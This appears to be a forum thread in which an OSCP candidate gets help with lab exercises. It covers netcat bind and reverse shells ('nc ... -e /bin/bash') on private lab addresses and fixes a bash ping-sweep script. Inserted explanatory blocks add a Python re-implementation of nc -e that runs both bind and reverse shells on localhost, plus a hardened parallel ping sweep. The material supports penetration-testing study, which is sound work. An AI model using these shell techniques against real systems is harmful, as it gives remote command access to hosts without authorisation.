OSCP help - Netcat
McxRisley
Member Posts: 494 ■■■■■□□□□□
Hey guys! I am currently doing some prep study before I sign up for the OSCP and I was wondering if any of you would be able to help me with some issues I am having with Netcat. I am reading and doing the labs in Georgia Weidman's Penetration Testing book and I am unable to get the reverse shell code to work with Netcat. I know that Kali now comes with the OpenBSD version of Netcat, which does not have the -e command. So I downloaded the old GNU 0.7.1 version that has the required command. The book calls for the following commands to be entered into the shell.
In the first terminal enter:
root@kali:~# nc -lvp 1234 -e /bin/bash
In the second terminal enter:
root@kali:~# nc 192.168.20.9 1234
When I enter the second command into the second terminal it gives me the following message:
/bin/bash/ not found: connection reset by peer
and then it closes the connection. Any help or advice on this would be GREATLY appreciated since I have been unable to find any articles or anything about how to fix this issue anywhere.
I'm not allowed to say what my previous occupation was, but let's just say it rhymes with architect.
Comments
BlackBeret Member Posts: 683 ■■■■■□□□□□ I would start by adding -v to the second command; this will increase the verbosity and may give you more detail in the error message. I'm not on my Kali machine at the moment so I can't test this one, but try running '/bin/bash' locally and see if it runs a shell; also try '/bin/sh' to see if your default shell is something else.
ilikeshells Member Posts: 59 ■■□□□□□□□□ You are doing a bind shell, not a reverse shell. Have you tried:
#1: nc -nlvp 5555 # listen for incoming shell
#2: nc -nv x.x.x.x 5555 -e /bin/bash # send shell.
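What the two netcat invocations above actually do, as an added example that is not from the post, the book or netcat itself: a small Python re-implementation of -e that hands the connected socket to a child process as its stdin, stdout and stderr, run both as a bind shell (target listens, handler connects in, as in the first post) and as a reverse shell (handler listens, target calls back, as in this reply) on 127.0.0.1. It also probes what exec does with the exact path string shown in the error message in the first post, /bin/bash/ with a trailing slash, compared with a plain shell path. The function names, the ephemeral-port choice and the use of /bin/sh for the runnable part are assumptions of this example.

```python
"""What `nc -e PROGRAM` does, as bind and reverse shells on localhost.

Added example, not the post's or netcat's code: it re-implements the -e
behaviour (start a program with the connected socket as fds 0, 1 and 2) so
the bind/reverse distinction can be run and checked locally.
Assumes a POSIX host with /bin/sh.
"""
import errno
import socket
import subprocess
import threading
import time


def serve_shell(sock, program):
    """The core of `-e`: start PROGRAM with the socket as its stdin/stdout/stderr."""
    fd = sock.fileno()
    return subprocess.Popen([program], stdin=fd, stdout=fd, stderr=fd)


def bind_shell(host, port, program):
    """Target side of `nc -lvp PORT -e PROGRAM`: listen, accept one client, serve it."""
    with socket.socket() as listener:
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((host, port))
        listener.listen(1)
        conn, _ = listener.accept()
    with conn:
        return serve_shell(conn, program).wait()


def reverse_shell(host, port, program):
    """Target side of `nc HOST PORT -e PROGRAM`: connect out, then serve the socket."""
    with socket.create_connection((host, port)) as conn:
        return serve_shell(conn, program).wait()


def drive(sock, command):
    """Handler side: send one command line, return everything the shell sends back."""
    sock.sendall(command.encode() + b"; exit\n")
    out = b""
    while chunk := sock.recv(4096):
        out += chunk
    return out.decode()


def demo_reverse(program="/bin/sh"):
    """Handler listens first (nc -nlvp), target calls back (nc -nv HOST PORT -e)."""
    with socket.socket() as listener:
        listener.bind(("127.0.0.1", 0))      # port 0: let the kernel pick a free one
        listener.listen(1)
        port = listener.getsockname()[1]
        target = threading.Thread(target=reverse_shell,
                                  args=("127.0.0.1", port, program), daemon=True)
        target.start()
        conn, _ = listener.accept()
    with conn:
        out = drive(conn, "echo got reverse")
    target.join()
    return out


def demo_bind(program="/bin/sh"):
    """Target listens first (nc -lvp PORT -e), handler connects in (nc HOST PORT)."""
    with socket.socket() as tmp:              # pick a free port for the target to bind
        tmp.bind(("127.0.0.1", 0))
        port = tmp.getsockname()[1]
    target = threading.Thread(target=bind_shell,
                              args=("127.0.0.1", port, program), daemon=True)
    target.start()
    conn = None
    for _ in range(100):                      # wait for the bind shell to come up
        try:
            conn = socket.create_connection(("127.0.0.1", port))
            break
        except ConnectionRefusedError:
            time.sleep(0.05)
    if conn is None:
        raise RuntimeError("bind shell never started listening")
    with conn:
        out = drive(conn, "echo got bind")
    target.join()
    return out


def probe_exec(path):
    """Exec PATH the way -e would; return "OK" or the errno name the exec failed with."""
    try:
        subprocess.run([path, "-c", "exit 0"], check=False)
        return "OK"
    except OSError as exc:
        return errno.errorcode.get(exc.errno, str(exc.errno))


if __name__ == "__main__":
    print(demo_bind(), end="")
    print(demo_reverse(), end="")
    for p in ("/bin/sh", "/bin/bash", "/bin/bash/"):
        print(p, "->", probe_exec(p))
```

A trailing slash makes the kernel require a directory at that path, so exec of /bin/bash/ fails with ENOTDIR before any shell starts; when nc reports the -e program as not found, running the exact path string on its own locally is the first check to make. Both demos drive the shell through the socket in the same way; the only difference between bind and reverse is which end opens the TCP connection.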
McxRisley Member Posts: 494 ■■■■■□□□□□ UPDATE: After doing some research I went home and entered '/bin/sh/' instead of '/bin/bash/' and it worked both ways. My next question is: is 'sh' the same as 'bash'? Also, I am now having another issue with a bash script that runs a ping sweep on my local network. The script is:
#!/bin/bash
if [ "$1" == "" ]
then
echo "Usage: ./pingscript.sh [network]"
echo "example: ./pingscript.sh 192.168.20"
else
for x in `seq 1 254`; do
ping -c 1 $1.$x
done
fi
The script returns:
unknown host 192.168.0.seq
I really appreciate the help guys. I am a newbie to Linux so sorry if these questions seem kinda dumb haha
BlackBeret Member Posts: 683 ■■■■■□□□□□ /bin/sh is a link that points to your default shell. There are different shell programs on Linux; the default is usually bash, but since you were having trouble with it there's no harm in pointing to /bin/sh and letting it redirect you to the default.
BlackBeret Member Posts: 683 ■■■■■□□□□□ That script looks and runs fine in bash. I'm wondering if Kali is using something other than bash by default. Different shells will respond differently.
If /bin/sh worked on the previous exercise when /bin/bash didn't, type the following into a command prompt:
ls -alF /bin/sh
Then look at what /bin/sh is pointing to; this will tell you what your default shell is.
McxRisley Member Posts: 494 ■■■■■□□□□□ How would I check for that? I know it has to be something with my script because if I use nmap to perform a ping sweep it works just fine.
kaizen_404 Member Posts: 16 ■□□□□□□□□□
There's a slight error in the script. Try this: for x in $(seq 1 254); do
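A hardened version of the ping sweep from McxRisley's post, with the $(seq 1 254) fix from the reply above, as an added example that is not from the book or the thread: it validates the prefix argument so a value like 192.168.0.seq becomes a usage error instead of 254 failed lookups, pings the hosts in parallel with a timeout, and prints only the addresses that answered. It assumes iputils ping as shipped on Kali (-c, and -W in seconds); the PING variable is an addition of this example so the logic can be exercised without raw-socket privileges (for instance PING=true).

```shell
#!/bin/sh
# Ping sweep: hardened form of the pingscript.sh from the thread (added example).
# Assumes iputils ping (-c COUNT, -W SECONDS). PING=... overrides the ping binary.

# Accept only a dotted three-octet prefix such as 192.168.20.
# Anything else (for instance "192.168.0.seq") is a usage error, not 254 lookups.
valid_prefix() {
    printf '%s\n' "$1" | grep -Eq '^([0-9]{1,3}\.){2}[0-9]{1,3}$'
}

# Print the 254 host addresses in PREFIX.0/24, one per line.
# $(seq 1 254) is a command substitution; a quoted 'seq 1 254' is the literal word.
targets() {
    for x in $(seq 1 254); do
        printf '%s.%s\n' "$1" "$x"
    done
}

# Ping every host once with a 1 s timeout, all in parallel, and print only the
# ones that answered (the original script printed each ping's full output).
sweep() {
    if ! valid_prefix "$1"; then
        echo "Usage: $0 [network]   example: $0 192.168.20" >&2
        return 2
    fi
    for host in $(targets "$1"); do
        ( ${PING:-ping} -c 1 -W 1 "$host" >/dev/null 2>&1 && echo "$host" ) &
    done
    wait
}

# Run as a script: ./pingscript.sh 192.168.20
if [ $# -gt 0 ]; then
    sweep "$1"
fi
```

Output order is whatever order the replies come back in, so pipe through sort -t. -k4,4n when you want the hosts numbered; nmap -sn on the same /24 is the usual cross-check.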